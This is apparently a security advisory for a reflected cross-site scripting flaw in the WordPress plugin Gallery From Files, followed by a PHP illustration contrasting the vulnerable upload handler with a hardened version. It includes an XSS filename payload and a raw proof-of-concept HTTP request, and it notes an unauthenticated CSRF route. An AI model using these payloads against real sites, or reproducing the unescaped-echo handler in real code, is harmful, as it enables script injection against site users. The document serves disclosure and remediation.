wpexploit - Satyender Yadav - WPEX-ID:6BB4EB71-D702-4732-B01F-B723077D66CA
History: May 26, 2021 - 12:00 a.m.

Gallery From Files <= 1.6.0 - Reflected Cross-Site Scripting (XSS)

cross-site scripting
reflected
file upload
security vulnerability

EPSS

0.001

Percentile

33.4%

The plugin lets users upload images to the server, but the filename is not sanitised before it is echoed back in the error message shown when the file has an invalid extension, resulting in reflected Cross-Site Scripting. Because the upload handler performs no CSRF (nonce) check, the same payload can also be delivered through a CSRF attack against a logged-in user.

Steps:

1. Rename any file to <img src=x onerror=alert(1337)>
2. Select this file for upload and click the "upload selected file" button.
3. While the file is uploading, an alert box containing "1337" pops up, showing that the filename was executed as HTML.

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------245018834521283925753967681812
Content-Length: 506
Cookie: [any user or even unauthenticated]
Connection: close

-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="myfile[]"; filename="<img src onerror=alert(2)>"
Content-Type: image/png


-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="action"

gallery_from_files_595_fileupload
-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="filesName"

myfile
-----------------------------245018834521283925753967681812--
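The request above reaches an admin-ajax.php handler that echoes the filename straight into its error text. The following is an added illustration written for this advisory, not the plugin's own code: a hypothetical handler showing the vulnerable pattern the advisory describes next to a hardened version that adds the missing nonce check, a capability check, filename sanitisation and output escaping. The function names (gff_vuln_handle_upload, gff_safe_handle_upload), the nonce action name gff_upload and the allowed-extension list are assumptions; only the AJAX action name comes from the PoC request.

```php
<?php
// Added illustration, not code from the Gallery From Files plugin.
// Function names, the 'gff_upload' nonce action and the extension
// whitelist are assumptions made for this example.

// Vulnerable pattern (as described in the advisory): the uploaded
// filename is written into the response without escaping, and nothing
// binds the request to the current user, so a victim can be made to
// send it via CSRF or it can be triggered unauthenticated.
function gff_vuln_handle_upload() {
    $allowed = array( 'jpg', 'jpeg', 'png', 'gif' );
    foreach ( (array) $_FILES['myfile']['name'] as $name ) {
        $ext = strtolower( pathinfo( $name, PATHINFO_EXTENSION ) );
        if ( ! in_array( $ext, $allowed, true ) ) {
            // With $name = '<img src=x onerror=alert(1337)>' the browser
            // parses the filename as HTML and runs the onerror handler.
            echo 'Error: ' . $name . ' has an invalid extension';
        }
    }
    wp_die();
}

// Hardened pattern.
function gff_safe_handle_upload() {
    // 1. Require a valid nonce tied to this action; check_ajax_referer()
    //    dies with a 403 if the 'nonce' field is missing or wrong, which
    //    closes the CSRF delivery route.
    check_ajax_referer( 'gff_upload', 'nonce' );

    // 2. Require a capability so anonymous callers get nothing.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $allowed = array( 'jpg', 'jpeg', 'png', 'gif' );
    $errors  = array();
    foreach ( (array) $_FILES['myfile']['name'] as $name ) {
        // 3. Normalise the name before checking it and before echoing it.
        $name = sanitize_file_name( wp_unslash( $name ) );
        $ext  = strtolower( pathinfo( $name, PATHINFO_EXTENSION ) );
        if ( ! in_array( $ext, $allowed, true ) ) {
            // 4. Escape on output. esc_html() neutralises '<', '>' and
            //    quotes; the JSON helper also sets a non-HTML content type.
            $errors[] = sprintf( 'File %s has an invalid extension', esc_html( $name ) );
        }
    }

    if ( ! empty( $errors ) ) {
        wp_send_json_error( $errors, 400 );
    }
    wp_send_json_success();
}

// Register only the authenticated hook. Not adding a matching
// 'wp_ajax_nopriv_...' action means the unauthenticated entry point
// implied by the PoC ("Cookie: any user or even unauthenticated")
// simply does not exist.
add_action( 'wp_ajax_gallery_from_files_595_fileupload', 'gff_safe_handle_upload' );
```

The fix is two independent controls: the nonce and capability checks stop the request from being forged or made anonymously, and escaping (plus a non-HTML response type) stops any filename that does get reflected from being interpreted as markup. Either one alone leaves a gap: a nonce does not help an authenticated user who uploads a crafted filename themselves, and escaping alone still lets the endpoint be abused via CSRF for whatever else it does.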

